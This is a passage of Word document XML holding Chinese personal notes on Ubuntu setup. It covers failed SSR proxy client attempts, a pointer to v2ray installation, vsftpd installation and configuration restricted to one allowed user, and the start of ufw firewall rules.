    <w:p w14:paraId="56DD720F" w14:textId="0B7EF712" w:rsidR="00C379A3" w:rsidRDefault="00C379A3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D91B3F" w14:textId="625E68E3" w:rsidR="00953D71" w:rsidRDefault="00953D71" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先说结论，命令行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装下面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都失败了，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubunti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上不稳定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A92862" w14:textId="77777777" w:rsidR="00953D71" w:rsidRDefault="00953D71" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707CEF92" w14:textId="06033EDA" w:rsidR="00C379A3" w:rsidRDefault="00953D71" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r w:rsidRPr="00C32DBD">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://github.com/TyrantLucifer/ssr-command-client/blob/master/README_CH.md</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，调试该包过程中有各种初始化错误，作者没有修复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0478D747" w14:textId="77777777" w:rsidR="00C379A3" w:rsidRDefault="00C379A3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F72543B" w14:textId="086D9F17" w:rsidR="00C802DC" w:rsidRDefault="00BC11C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC11C0">
        <w:t>https://l3zc.com/2022/11/ubuntu-22-04-electron-ssr-troubleshoot/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F32A7" w14:textId="3BDC59EB" w:rsidR="008A0780" w:rsidRDefault="00C802DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C802DC">
        <w:t>https://github.com/qingshuisiyuan/electron-ssr-backup/blob/master/Ubuntu.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B3DB12" w14:textId="0842353B" w:rsidR="004C452C" w:rsidRDefault="00960FFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00960FFE">
        <w:t>https://linuxhint.com/install-python-pip-ubuntu-22-04/#:~:text=Python%20is%20available%20in%20two,the%20Ubuntu%2022.04%20official%20repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F00CE9B" w14:textId="322C9455" w:rsidR="00960FFE" w:rsidRDefault="00960FFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E98C453" w14:textId="19DAA802" w:rsidR="00953D71" w:rsidRDefault="00953D71" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="266" w:name="_Toc159779726"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>2ray</w:t>
      </w:r>
      <w:bookmarkEnd w:id="266"/>
    </w:p>
    <w:p w14:paraId="734353F9" w14:textId="746C06DA" w:rsidR="00A36436" w:rsidRDefault="00A36436" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F4FC6E3" w14:textId="54E566DE" w:rsidR="00953D71" w:rsidRDefault="00953D71" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推荐，</w:t>
      </w:r>
      <w:r w:rsidR="00BF432D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参见</w:t>
      </w:r>
      <w:r w:rsidR="00BF432D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF432D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络代理</w:t>
      </w:r>
      <w:r w:rsidR="00BF432D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF432D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大章来安装。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A30610A" w14:textId="2D07A862" w:rsidR="00953D71" w:rsidRDefault="00953D71" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D372DF" w14:textId="61F575D5" w:rsidR="00953D71" w:rsidRDefault="00953D71" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B65E7F" w14:textId="0F53FA1E" w:rsidR="00D001A9" w:rsidRDefault="00D001A9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23AF0B6B" w14:textId="0D55DC65" w:rsidR="00D001A9" w:rsidRDefault="00D001A9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698F9ACC" w14:textId="61861342" w:rsidR="00D001A9" w:rsidRDefault="00D001A9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="267" w:name="_Toc159779727"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:bookmarkEnd w:id="267"/>
    </w:p>
    <w:p w14:paraId="31F4BDF9" w14:textId="5CAF7F02" w:rsidR="00D001A9" w:rsidRDefault="00D001A9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A85F12" w14:textId="5EFD98E0" w:rsidR="000939E9" w:rsidRDefault="000939E9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标：安装一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器，只允许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r>
        <w:t>user ftpuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580895C2" w14:textId="7EE79195" w:rsidR="00D001A9" w:rsidRDefault="00D001A9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14C90442" w14:textId="1C6C27E0" w:rsidR="0041210F" w:rsidRDefault="00CA5DCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> install vsftpd -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C42867A" w14:textId="2D2ABA1B" w:rsidR="00CA5DCB" w:rsidRDefault="007E6FE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>systemctl enable vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3273FA" w14:textId="4A2A24F9" w:rsidR="007E6FE8" w:rsidRDefault="007E6FE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>ystemctl start vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD92E69" w14:textId="445CD1B5" w:rsidR="007E6FE8" w:rsidRDefault="007E6FE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E5F50E" w14:textId="0AF3B1FB" w:rsidR="00A8621A" w:rsidRDefault="00A8621A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="268" w:name="_Toc159779728"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="268"/>
    </w:p>
    <w:p w14:paraId="1B12A71E" w14:textId="77777777" w:rsidR="00A8621A" w:rsidRDefault="00A8621A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01CD3B18" w14:textId="2D3EB1CA" w:rsidR="0041210F" w:rsidRDefault="009E6357" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vs</w:t>
      </w:r>
      <w:r>
        <w:t>ftpd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/vsftpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59375EBC" w14:textId="41AE8E74" w:rsidR="009E6357" w:rsidRPr="00D33B67" w:rsidRDefault="00111856" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>增加内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609BC072" w14:textId="7DC1EC07" w:rsidR="00613DF4" w:rsidRDefault="00613DF4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> FTP access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE476E" w14:textId="77E48F81" w:rsidR="00111856" w:rsidRDefault="00613DF4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00613DF4">
        <w:t>anonymous_enable=NO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1205E2" w14:textId="0B2FBE92" w:rsidR="00111856" w:rsidRDefault="00613DF4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00613DF4">
        <w:t>local_enable=YES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E36C7A2" w14:textId="227B7B4C" w:rsidR="0041210F" w:rsidRDefault="00A00D20" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t># Enable upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F70424" w14:textId="29C2E28F" w:rsidR="00D001A9" w:rsidRDefault="00F205C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F205C9">
        <w:t>write_enable=YES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A4BE9" w14:textId="617E0630" w:rsidR="00F205C9" w:rsidRDefault="00596183" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>防止访问限定目录以外的目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76897120" w14:textId="77777777" w:rsidR="00596183" w:rsidRDefault="00596183" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>chroot_local_user=YES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0382AE68" w14:textId="11C5C7F9" w:rsidR="00F205C9" w:rsidRDefault="00596183" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>allow_writeable_chroot=YES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3460C2DE" w14:textId="4F15A788" w:rsidR="00F205C9" w:rsidRDefault="00FA2EDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A7A2F" w:rsidRPr="00D33B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidR="001A7A2F" w:rsidRPr="00D33B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>被动模式动态端口范围</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A99C735" w14:textId="77777777" w:rsidR="00FA2EDB" w:rsidRDefault="00FA2EDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pasv_min_port=30000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2249E5CC" w14:textId="387BFF04" w:rsidR="00D001A9" w:rsidRDefault="00FA2EDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pasv_max_port=31000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6DE4CA" w14:textId="6FCB56F0" w:rsidR="00D001A9" w:rsidRDefault="00D83B08" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>限制用户登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB51DB6" w14:textId="77777777" w:rsidR="00D83B08" w:rsidRDefault="00D83B08" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>userlist_enable=YES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7541A881" w14:textId="77777777" w:rsidR="00D83B08" w:rsidRDefault="00D83B08" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>userlist_file=/etc/vsftpd.user_allow_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D333AA" w14:textId="3B41D67B" w:rsidR="00D83B08" w:rsidRDefault="00D83B08" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>userlist_deny=NO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9BADDE" w14:textId="47332EB6" w:rsidR="00781D95" w:rsidRDefault="00781D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00781D95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00781D95">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00781D95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00781D95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00781D95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743C8C78" w14:textId="491F5213" w:rsidR="00A61188" w:rsidRDefault="00781D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>local</w:t>
      </w:r>
      <w:r>
        <w:t>_root=/srv/ftp/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC25C8" w14:textId="77777777" w:rsidR="00A61188" w:rsidRPr="00CA59ED" w:rsidRDefault="00A61188" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B260BC6" w14:textId="77777777" w:rsidR="00A61188" w:rsidRDefault="00A61188" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F57AEFF" w14:textId="430D6464" w:rsidR="0031366A" w:rsidRDefault="0031366A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00A814E4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/vsftpd.user_allow_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是允许登录用户的列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D126F1" w14:textId="3A50A8F2" w:rsidR="0031366A" w:rsidRDefault="0031366A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A24722" w14:textId="2A566D2D" w:rsidR="00D001A9" w:rsidRDefault="0031366A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A814E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00A814E4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>tpuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12376530" w14:textId="50A7129E" w:rsidR="00A36436" w:rsidRDefault="00A36436" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B41EF75" w14:textId="77777777" w:rsidR="00CA59ED" w:rsidRDefault="00CA59ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2098F818" w14:textId="77777777" w:rsidR="00CA59ED" w:rsidRDefault="00CA59ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10CEDED0" w14:textId="60BEB27F" w:rsidR="00987433" w:rsidRDefault="00A8621A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="269" w:name="_Toc159779729"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置防火墙</w:t>
      </w:r>
      <w:bookmarkEnd w:id="269"/>
    </w:p>
    <w:p w14:paraId="764B24D8" w14:textId="77777777" w:rsidR="00763A81" w:rsidRDefault="00763A81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF5448E" w14:textId="5065765F" w:rsidR="00763A81" w:rsidRPr="00763A81" w:rsidRDefault="00763A81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00763A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00763A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r w:rsidRPr="00763A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的设置，不影响当前已有连接，因此，修改后可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00763A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="00763A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不会第一时间断，如果再开</w:t>
      </w:r>
      <w:r w:rsidRPr="00763A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00763A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的连接，就连接不上了。修改规则后记得</w:t>
      </w:r>
      <w:r w:rsidRPr="00763A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> u</w:t>
      </w:r>
      <w:r w:rsidRPr="00763A81">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fw enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69879F33" w14:textId="77777777" w:rsidR="00763A81" w:rsidRDefault="00763A81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F942EB" w14:textId="04F44E0E" w:rsidR="00763A81" w:rsidRDefault="00763A81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先默认执行如下命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2D8CC3" w14:textId="77777777" w:rsidR="00763A81" w:rsidRPr="002B5FCB" w:rsidRDefault="00763A81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5FCB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw default deny incoming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058FFB80" w14:textId="77777777" w:rsidR="00763A81" w:rsidRDefault="00763A81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C755A6" w14:textId="77777777" w:rsidR="00763A81" w:rsidRPr="00763A81" w:rsidRDefault="00763A81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131875C4" w14:textId="69A585A2" w:rsidR="000939E9" w:rsidRDefault="004C0D4D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> allow 30000:31000/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E047BF6" w14:textId="3C9B94FD" w:rsidR="004C0D4D" w:rsidRDefault="004C0D4D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
